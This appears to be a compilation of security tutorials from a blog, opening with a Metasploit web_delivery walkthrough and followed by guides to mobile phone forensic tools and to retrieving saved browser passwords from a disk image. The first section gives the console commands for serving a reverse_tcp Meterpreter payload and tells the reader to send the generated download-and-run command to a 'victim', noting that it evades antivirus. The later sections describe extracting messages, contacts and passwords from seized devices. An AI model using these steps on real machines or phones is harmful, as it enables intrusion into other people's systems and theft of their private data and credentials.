Hack Remote Windows PC using Script Web Delivery

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.1.108 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

Copy the highlighted text shown In below window and send it to the victim

When the victim paste the highlighted text in command prompt and run it ,you get the meterpreter of victim system

Now type sessions –l to display sessions opened when the victim opens the link

Now the session has opened type sysinfo to get system information, then type shell to enter into Victims command prompt.

Forensic Investigation of Any Mobile Phone with MOBILedit Forensic

With MOBILedit Forensic you can view, search or retrieve all data from a phone with only a few clicks. This data includes call history, phonebook, text messages, multimedia messages, files, calendars, notes, reminders and raw application data. It will also retrieve all phone information such as IMEI, operating systems, firmware including SIM details (IMSI), ICCID and location area information. Where possible MOBILedit Forensic is also able to retrieve deleted data from phones and bypass the passcode, PIN and phone backup encryption.

Note: USB Debugging must be enabled.

Download the MOBILedit!  Forensic from here & Install on your PC. Now Click on MOBILedit! Forensic.

Click on Connect Option. MOBILEedit! Forensic Wizard will run and ask for Phone, Data file or SIM Card. Select Phone Option.  Click on Next.

Now it will ask for type of connection. Select Cable Connection. And click on Next.

Now follow the instructions such as install Driver or turn on USB debugging if connecting Android.

Now connect the phone via data cable. If prompted choose connection mode to PC Sync or COM port. Click on Next Option.

It will show the connected mobile. Check your Mobile model and click on Next.

To take the Backup, first of all enter Owner Name, Device Evidence Number and Owner Phone Number.

Click on Browse Option to select the path folder where backup data will be stored and click on Next.

Now it will ask for part of file system to   backup. Choose Whole File System or Specified File Types such as Audio, Video or pictures. Then Click on Next.

Now it will show the progress bar for Back Up and after completion click on Next.

Now select the check box for Phone memory extraction and click on Next.

Now it will show the message for creation of memory dump on memory card file. Click on Next.

Now select the group….Cases   to organize device data or click on   <New Case > to create new case and click on Next.

If we have selected New Case Option, then it will ask for Case Number and investigator details .Enter

 Investigator Details and click on Next.

Now select the Template for Data Export and Click on Finish.

Now select the Template for Data Export and Click on Finish.

Now it will show the generated Forensic Report.

Select Connected Device Option.

Now it will generate a report with all the details such as Phone book, Call logs, messages, Files etc.

To get phone book details, select Phone book option.

Now you can select sub option such as WhatApp to see WhatsApp Messages.

Click on Call Logs to see Missed Calls, Outgoing calls and Incoming calls.

Now Click on Messages to see all received, sent and draft messages.

Click on Application Data to get all the details about content providers.

Click on Application to see all the installed Apps in Mobile.

Select Files Option to see all the details about system files in Mobile.

Now Click on Media and select internal media or user media and then select pictures option to see Pictures.

To view User‘s Files, Click on Option User Files.

Android Mobile Device Forensics with Mobile Phone Examiner Plus

AccessData (AD) Mobile Phone Examiner Plus (MPE+) is a powerful mobile device data review tool that can be used in the field as part of a mobile field unit or in the lab. Additionally, data extracted from mobile devices using MPE+ can be easily imported into an FTK case, which offers more in-depth drill-down, categorization, full-text index searching, and all of this is right alongside other digital evidence collected for a case. MPE+ can extract information such as phone and address book data, media files, call logs, SMS and MMS messages, calendar, and file system data stored in the memory of a mobile device.

Download MPE+ from here & install in your PC.

Now Double click on MPE+ Icon to open it.

Note: USB Debugging must be enabled.

Now select the Drive Management option from Home tab.

To install the mobile driver in your system, click on download option from the given list.

It will install the driver. Click on Select Device.

Now enter the Manufacturer and Model No of the mobile. Click on Connect.

Now select the mobile android version and click on finish.

It will display a message. Connecting to Android Device.

Now it will show the Select Data for Extraction Pop Up. Click on Select All Option and select Extract Option.

It will show the Progress Bar for Android Logical Device Data Extraction.

Now click on Device Information, it will show all the details about the Android Mobile.

 Select Call History Option to see all incoming and outgoing call details with duration as well as date and time.

To view all the contacts in the mobile, select Contacts option.

To get all the SMS messages, Select SMS Option.

To see how many android packages have been installed, select Android Packages.

To see all the connected Bluetooth devices, click on Bluetooth Devices Option.

To get the information about the WIFI connections connected with this android mobile, select WiFi Hotspots.

To see the bookmarks, click on WEB option and then select Bookmarks Sub option.

To get Browser History, Click on Web Option and select Browser History Sub option.

To see all the images existing in the Android Mobile from different resources, select Media option and click on Image Sub option.

To get the information about all video files, Select Video sub option from Media Option.

How to Retrieve Saved Password from RAW Evidence Image

First Download OS Forensic from here and install in your pc then open OSForensic and click on Create  Case  button to  create a new forensic case.

Now enter the details such as Case Name, Investigator Name, Default Drive, and Acquisition Type To specify the case folder, click on browse & select the Location where you want to save your Evidence Report. Now click on ok.

Now it will show us the registered case in this tool. Now to manage this case, click on Add Device option available in Manage Case.

Now select Image File option in Select Device to add option. Now assign the path of the folder where image file exists and also give the Display Name which is compulsory. Click on OK Button.

Now to get the saved browser password clicks on Find Browser Passwords Option and selects the Scan Drive option and then click on Retrieve Password. It will show you all saved passwords  in RAW Image.